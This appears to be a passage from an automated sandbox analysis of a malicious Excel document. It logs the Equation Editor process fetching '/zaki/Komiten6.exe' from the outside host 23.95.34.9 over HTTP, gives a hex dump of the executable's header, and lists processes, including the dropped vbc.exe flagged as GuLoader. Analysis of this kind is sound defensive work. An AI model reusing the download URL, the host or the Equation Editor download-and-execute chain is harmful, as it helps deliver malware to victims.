      May 14, 2022 15:22:35.661596060 CEST804917123.95.34.9192.168.2.22
      May 14, 2022 15:22:35.661618948 CEST804917123.95.34.9192.168.2.22
      May 14, 2022 15:22:35.661621094 CEST4917180192.168.2.2223.95.34.9
      May 14, 2022 15:22:35.661645889 CEST804917123.95.34.9192.168.2.22
      May 14, 2022 15:22:35.661669016 CEST804917123.95.34.9192.168.2.22
      May 14, 2022 15:22:35.661674023 CEST4917180192.168.2.2223.95.34.9
      May 14, 2022 15:22:35.661681890 CEST4917180192.168.2.2223.95.34.9
      May 14, 2022 15:22:35.661701918 CEST4917180192.168.2.2223.95.34.9
      May 14, 2022 15:22:35.664642096 CEST4917180192.168.2.2223.95.34.9
      May 14, 2022 15:22:35.838490963 CEST804917123.95.34.9192.168.2.22
      May 14, 2022 15:22:35.838522911 CEST804917123.95.34.9192.168.2.22
      May 14, 2022 15:22:35.838541985 CEST804917123.95.34.9192.168.2.22
      May 14, 2022 15:22:35.838555098 CEST804917123.95.34.9192.168.2.22
      May 14, 2022 15:22:35.838572979 CEST804917123.95.34.9192.168.2.22
      May 14, 2022 15:22:35.838589907 CEST804917123.95.34.9192.168.2.22
      May 14, 2022 15:22:35.838592052 CEST4917180192.168.2.2223.95.34.9
      May 14, 2022 15:22:35.838604927 CEST804917123.95.34.9192.168.2.22
      May 14, 2022 15:22:35.838624001 CEST804917123.95.34.9192.168.2.22
      May 14, 2022 15:22:35.838634968 CEST4917180192.168.2.2223.95.34.9
      May 14, 2022 15:22:35.838639975 CEST4917180192.168.2.2223.95.34.9
      May 14, 2022 15:22:35.838644028 CEST4917180192.168.2.2223.95.34.9
      May 14, 2022 15:22:35.838646889 CEST804917123.95.34.9192.168.2.22
      May 14, 2022 15:22:35.838660955 CEST4917180192.168.2.2223.95.34.9
      May 14, 2022 15:22:35.838665962 CEST804917123.95.34.9192.168.2.22
      May 14, 2022 15:22:35.838686943 CEST804917123.95.34.9192.168.2.22
      May 14, 2022 15:22:35.838690042 CEST4917180192.168.2.2223.95.34.9
      May 14, 2022 15:22:35.838700056 CEST804917123.95.34.9192.168.2.22
      May 14, 2022 15:22:35.838717937 CEST804917123.95.34.9192.168.2.22
      May 14, 2022 15:22:35.838726997 CEST4917180192.168.2.2223.95.34.9
      May 14, 2022 15:22:35.838735104 CEST804917123.95.34.9192.168.2.22
      May 14, 2022 15:22:35.838752031 CEST4917180192.168.2.2223.95.34.9
      May 14, 2022 15:22:35.838752985 CEST804917123.95.34.9192.168.2.22
      May 14, 2022 15:22:35.838763952 CEST4917180192.168.2.2223.95.34.9
      May 14, 2022 15:22:35.838771105 CEST804917123.95.34.9192.168.2.22
      May 14, 2022 15:22:35.838783979 CEST804917123.95.34.9192.168.2.22
      May 14, 2022 15:22:35.838802099 CEST804917123.95.34.9192.168.2.22
      May 14, 2022 15:22:35.838804007 CEST4917180192.168.2.2223.95.34.9
      May 14, 2022 15:22:35.838816881 CEST4917180192.168.2.2223.95.34.9
      May 14, 2022 15:22:35.838820934 CEST804917123.95.34.9192.168.2.22
      May 14, 2022 15:22:35.838840008 CEST804917123.95.34.9192.168.2.22
      May 14, 2022 15:22:35.838845968 CEST4917180192.168.2.2223.95.34.9
      May 14, 2022 15:22:35.838857889 CEST804917123.95.34.9192.168.2.22
      May 14, 2022 15:22:35.838874102 CEST4917180192.168.2.2223.95.34.9
      May 14, 2022 15:22:35.838876009 CEST804917123.95.34.9192.168.2.22
      May 14, 2022 15:22:35.838887930 CEST4917180192.168.2.2223.95.34.9
      May 14, 2022 15:22:35.838895082 CEST804917123.95.34.9192.168.2.22
      May 14, 2022 15:22:35.838901043 CEST4917180192.168.2.2223.95.34.9
      • 23.95.34.9
      Session IDSource IPSource PortDestination IPDestination PortProcess
      0192.168.2.224917123.95.34.980C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
      TimestampkBytes transferredDirectionData
      May 14, 2022 15:22:35.305181026 CEST2OUTGET /zaki/Komiten6.exe HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
      Host: 23.95.34.9
      Connection: Keep-Alive
      May 14, 2022 15:22:35.484261990 CEST3INHTTP/1.1 200 OK
      Date: Sat, 14 May 2022 13:22:35 GMT
      Server: Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/8.0.18
      Last-Modified: Fri, 13 May 2022 13:26:01 GMT
      ETag: "1dd5e-5dee49d9d61f9"
      Accept-Ranges: bytes
      Content-Length: 122206
      Keep-Alive: timeout=5, max=100
      Connection: Keep-Alive
      Content-Type: application/x-msdownload
      Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 ad 31 08 81 e9 50 66 d2 e9 50 66 d2 e9 50 66 d2 2a 5f 39 d2 eb 50 66 d2 e9 50 67 d2 4c 50 66 d2 2a 5f 3b d2 e6 50 66 d2 bd 73 56 d2 e3 50 66 d2 2e 56 60 d2 e8 50 66 d2 52 69 63 68 e9 50 66 d2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 1f 9b 4f 61 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 68 00 00 00 2a 02 00 00 08 00 00 40 36 00 00 00 10 00 00 00 80 00 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 06 00 00 00 04 00 00 00 00 00 00 00 00 f0 07 00 00 04 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 04 85 00 00 a0 00 00 00 00 d0 07 00 10 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 b0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 76 66 00 00 00 10 00 00 00 68 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 9a 13 00 00 00 80 00 00 00 14 00 00 00 6c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 78 03 02 00 00 a0 00 00 00 06 00 00 00 80 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 6e 64 61 74 61 00 00 00 20 05 00 00 b0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 c0 2e 72 73 72 63 00 00 00 10 1d 00 00 00 d0 07 00 00 1e 00 00 00 86 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      Data Ascii: MZ@!L!This program cannot be run in DOS mode.$1PfPfPf*_9PfPgLPf*_;PfsVPf.V`PfRichPfPELOah*@6@@.textvfh `.rdatal@@.datax@.ndata .rsrc@@


      Click to jump to process

      Target ID:0
      Start time:15:22:13
      Start date:14/05/2022
      Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
      Wow64 process (32bit):false
      Commandline:"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
      Imagebase:0x13fef0000
      File size:28253536 bytes
      MD5 hash:D53B85E21886D2AF9815C377537BCAC3
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Reputation:high

      Target ID:2
      Start time:15:22:38
      Start date:14/05/2022
      Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
      Wow64 process (32bit):true
      Commandline:"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
      Imagebase:0x400000
      File size:543304 bytes
      MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Reputation:high

      Target ID:4
      Start time:15:22:42
      Start date:14/05/2022
      Path:C:\Users\Public\vbc.exe
      Wow64 process (32bit):true
      Commandline:"C:\Users\Public\vbc.exe"
      Imagebase:0x400000
      File size:122206 bytes
      MD5 hash:5D160471A3168EAC0D8C34060B4F357B
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Yara matches:
      • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000004.00000002.1166385504.0000000003FB0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
      Antivirus matches:
      • Detection: 24%, ReversingLabs
      Reputation:low

      No disassembly